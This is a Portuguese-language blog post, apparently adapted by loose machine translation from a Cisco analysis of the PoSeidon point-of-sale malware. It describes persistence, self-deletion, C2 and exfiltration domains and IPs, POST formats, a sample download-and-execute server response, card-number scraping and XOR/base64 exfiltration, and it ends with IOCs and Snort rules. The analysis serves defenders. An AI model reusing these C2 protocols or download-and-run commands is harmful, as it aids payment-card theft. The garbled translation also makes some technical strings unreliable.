Saiba tudo sobre o Poseidon - A Terrível Ameaça do Varejista

Recentemente um novo tipo ameaças, de codinome Poseidon, vem tirando o sono de muitos empresários no mundo afora, principalmente os responsáveis por redes de varejistas. Essa ameaça é conhecida por roubar informações nos sistemas de ponto de venda (PDV) no momento da utilização de cartões de credito.

No texto abaixo, adaptado do site blogs.cisco, você vai conhecer com mais detalhes o funcionamento do terrível Poseidon


A Ameaça Poseidon

Quando os consumidores fazem compras de um varejista, a transação é processada através de sistemas de ponto-de-venda (PDV). Quando um cartão de crédito ou de débito, é utilizado um sistema de POS é utilizado para ler a informação armazenada na fita magnética no verso do cartão de crédito. Uma vez que esta informação é roubado a partir de um comerciante, ele pode ser codificado numa fita magnética e usado por um novo cartão. 

Existem os "mercado negro" para comprar estas informações valiosa, porque os atacantes são capazes de rentabilizar facilmente os dados do cartão de crédito roubado. Incidentes envolvendo PoS Malwares têm vindo a aumentar, afetando muitas grandes organizações, bem como estabelecimentos de mom-and-pop pequenas e ganhando um monte de atenção da mídia. A presença de grandes quantidades de informação financeira e pessoal garante que essas empresas e seus sistemas de POS de varejo permanecerá alvos atraentes.

Visão geral

Há uma nova família de Malware visando sistemas de POS, infectando máquinas para pegar dados na memória com informações de cartão de crédito e enviar esses dados para servidores, também TLD principalmente os da .ru, para a colheita e provavelmente revenda. Esta nova família de Malware, que já apelidado de Poseidon, tem alguns componentes para ele, como ilustra o diagrama abaixo:

Em um nível alto, ele começa carregando um arquivo binário que ao ser executado tentará primeiro se manter na máquina de destino, a fim de sobreviver a uma possível reinicialização do sistema. Ao carregar ele se conectar com um servidor, que faz todo o gerenciamento das requisições, passando uma URL que contém um outro binário para baixar e executar as informações coletada. 

O binário baixado, FINDSTR , instala um keylogger e verifica a memória do dispositivo POS para sequências de números que podem ser números de cartão de crédito.Após a verificação de que os números estão em números de cartão de crédito, teclas e números de cartão de crédito são codificados e enviados para um servidor exfiltração.

Detalhes técnicos

Keylogger

O arquivo com SHA256 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4 talvez pudesse estar na origem do compromisso sistema POS. Chamamos isso de KeyLogger arquivo com base em informações de depuração encontrado no binário:

Após a execução, este arquivo se copia para tanto %SystemRoot%\system32\<filename>.exe ou %UserProfile%\<filename>.exe e adiciona entrada de registo sob HKLM (ou HKCU)\Software\Microsoft\Windows\CurrentVersion\Run .

O arquivo também abre HKCU\Software\LogMeIn Ignition e enumera as chaves para a chave de sub-conta, abre-e exclui o PasswordTicket Valor e obtém o Email Value. Também exclui árvore de registroHKCU\Software\LogMeIn Ignition\<key>\Profiles \ * .

O arquivo envia a um servidor exfiltration por postar dados para um desses URIs:

• wondertechmy[.]com/pes/viewtopic.php
• wondertechmy [.] ru / pes / viewtopic.php
• wondwondnew [.] ru / pes / viewtopic.php

 O formato é de URI

uid =% I64u & ganhar =% d.% d & vers =% s

O componente Keylogger foi potencialmente usado para roubar senhas e poderia ter sido o vetor de infecção inicial.

Carregador

O carregador para o malware Poseidon PoS recebe o nome de depuração informações encontradas no binário:

Após a ser executado, carregador verifica para ver se ele está sendo executado com um desses dois nomes de arquivo:

• WinHost.exe
• WinHost32.exe

Se não estiver, ele irá certificar-se de que nenhum serviço Windows está sendo executado com o nome WinHost. Carregador vai se copiar para % SystemRoot% \ System32 \ WinHost.exe , substituindo qualquer arquivo nesse local que iria acontecer de ter o mesmo nome. Em seguida, carregador vai iniciar um serviço chamado WinHost.

Isto é feito para que ele permaneça em execução na memória mesmo se o usuário atual efetue logoff.Se carregador não é capaz de instalar-se como um serviço, ele vai tentar encontrar outras instâncias de si mesmo em execução na memória e finalizá-las. Posteriormente, ele vai se copiar para % UserProfile% \ WinHost32.exe e instalar a chave do Registro HKCU \ Microsoft \ Windows \ CurrentVersion \ Run \\ WinHost32 . Finalmente, ele irá criar um novo processo para executar % UserProfile% \ WinHost32.exe .

Agora que a persistência foi alcançado, carregador irá apagar-se, executando o seguinte comando:

• cmd.exe / c del <path_to_itself> >> NUL

A instância do carregador funcionando em tentativa de memória para ler dados de configuração em % SystemRoot% \ System32 \ WinHost.exe.cfg . Este arquivo pode conter uma lista de URLs para ser adicionado a uma lista de URLs codificados já contida no carregador .

Loader então tenta entrar em contato com um dos servidores codificado C & C:

• linturefa.com
• xablopefgr.com
• tabidzuwek.com
• lacdileftre.ru
• tabidzuwek.com
• xablopefgr.com
• lacdileftre.ru
• weksrubaz.ru
• linturefa.ru
• mifastubiv.ru
• xablopefgr.ru
• tabidzuwek.ru

Os endereços IP associados:

• 151.236.11.167
• 185.13.32.132
• 185.13.32.48
• Redigido a pedido da Lei Federal Enforcement
• 31.184.192.196
• 91.220.131.116
• 91.220.131.87

Se um dos domínios acima resolver para um endereço IP de um HTTP POST é feita usando a seguinte string user-agent:

Mozilla / 4.0 (compatível; MSIE 8.0; Windows NT 6.1; Trident / 4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

dados POST é enviada para qualquer um:

• <IP ADDRESS>/ldl01/viewtopic.php
• <Endereço IP> /pes2/viewtopic.php

dados POST segue o formato:

uid =% I64u & uinfo =% s & ganhar =% d.% d & bits =% d & vers =% s & construir =% s

Carregador espera que a seguinte resposta do servidor C & C:

{<CommandLetter>: <ArgumentString>}

Exemplo de resposta:

• {R:http://badguy.com/malwarefilename.exe}
• {b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}

É por buscar e executar o executável referenciado na resposta do servidor que a segunda parte da Poseidon encontra o seu caminho para o dispositivo de PoS.

fINDSTR

O carregador para o malware Poseidon PoS recebe o nome de depuração informações encontradas no binário:

Um PE embutido é extraído através shellcode e execução continua com o binário incorporado. Este arquivo instala um keylogger mínima que é implementado de forma semelhante à descrição encontradaaqui . Os dados interceptados por este keylogger será posteriormente enviado para um servidor de exfiltração.

O PE, em seguida, percorre todos os processos em execução no dispositivo PoS a olhar para processos com um token de segurança não associado com o "NT AUTHORITY" nome de domínio. Ele itera através de todas as páginas de leitura / escrita dentro desses processos para informações sobre os cartões de crédito.

O malware procura somente sequências de números que começam com:

• 6, 5, 4, com um comprimento de 16 dígitos (Discover, Visa, Mastercard)
• 3 com um comprimento de 15 dígitos (American Express)

Em seguida, ele usa o algoritmo Luhn para verificar que os números são realmente números de cartão de crédito ou de débito, como mostrado pelo segmento de código abaixo:

Em seguida, a resolução de DNS é tentada para os domínios abaixo. Estes são alguns dos servidores exfiltração dados conhecidos:

• quartlet.com
• horticartf.com
• kilaxuntf.ru
• dreplicag.ru
• fimzusoln.ru
• wetguqan.ru

Se um dos domínios acima resolver para um endereço IP de um HTTP POST é feita usando a seguinte string user-agent:

Mozilla / 4.0 (compatível; MSIE 8.0; Windows NT 6.1; Trident / 4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

dados POST é enviada para:

<Endereço IP> /pes13/viewtopic.php

Dados segue o seguinte formato:

oprat = 2 & uid =% I64u & uinfo =% s & ganhar =% d.% d & vers =% s

Dados opcionais POST (dados: números de cartão de crédito, registros de dados: keylogger)

e dados = <XORed_with_0x2A_then_base64_data_unk> 
& registra = <XORed_with_0x2A_then_base64_data_unk>

números de cartão de crédito e dados keylogger é enviado para o servidor exfiltration depois de ser XORed e base64 codificado.

A resposta esperar do servidor exfiltração é:

Este mecanismo permite que o malware se atualizar, com base em comandos recebidos do servidor exfiltração.

Loader vs FINDSTR

Comparando uma cópia descompactada de carregador versão 11.4 a uma cópia descompactada deFINDSTR versão 7.1 com bindiff mostra que 62% da funcionalidade em ambas as amostras é o mesmo.Os atores por trás desse malware provavelmente desenvolveu algumas funcionalidades core e compilado-lo em uma biblioteca para ser utilizado por outros projetos que estão em desenvolvimento.

 COI

Clique para Endpoint COI Versão

Win.Trojan.PoSeidon.RegistryItem.iocWin.Trojan.PoSeidon.ProcessItem.iocWin.Trojan.PoSeidon.FileItem.ioc

domínios

• linturefa.com
• xablopefgr.com
• tabidzuwek.com
• linturefa.ru
• xablopefgr.ru
• tabidzuwek.ru
• weksrubaz.ru
• mifastubiv.ru
• lacdileftre.ru
• quartlet.com
• horticartf.com
• kilaxuntf.ru
• dreplicag.ru
• fimzusoln.ru
• wetguqan.ru

 Endereços IP:

• 151.236.11.167
• 185.13.32.132
• 185.13.32.48
• Redigido a pedido da Lei Federal Enforcement
• 31.184.192.196
• 91.220.131.116
• 91.220.131.87
• Redigido a pedido da Lei Federal Enforcement

Conclusão

Poseidon é outro no número crescente de sistemas de POS malwares Point-of-Sale segmentação que demonstram as técnicas e abordagens de autores de malware sofisticados. Atacantes vai continuar a orientar os sistemas de POS e empregam várias técnicas de ofuscação em uma tentativa de evitar a detecção. Enquanto ataques PoS continuar a proporcionar retornos, os atacantes vão continuar a investir em inovação e desenvolvimento de novas famílias de malware. Os administradores de rede terá de permanecer vigilantes e aderir às melhores práticas da indústria para garantir a cobertura e proteção contra o avanço ameaças de malware.

Regras do Snort: 33836-33852. Por favor, consulte Centro de Defesa ou FireSight console de gerenciamento para obter informações atualizadas.

Protegendo os usuários contra essas ameaças

Nós encorajamos as organizações a considerar as melhores práticas de segurança, começando com uma abordagem ameaça-centric. Dado o cenário de ameaças dinâmico, defendemos essa abordagem ameaça-centric e operacionalizado que implementa proteções em toda a rede estendida - e em todo o continuum de ataque total - antes, durante e depois de um ataque. Esta abordagem está baseado em visibilidade superior, controle contínuo e proteção avançada contra ameaças em toda a rede estendida e todo o contínuo ataque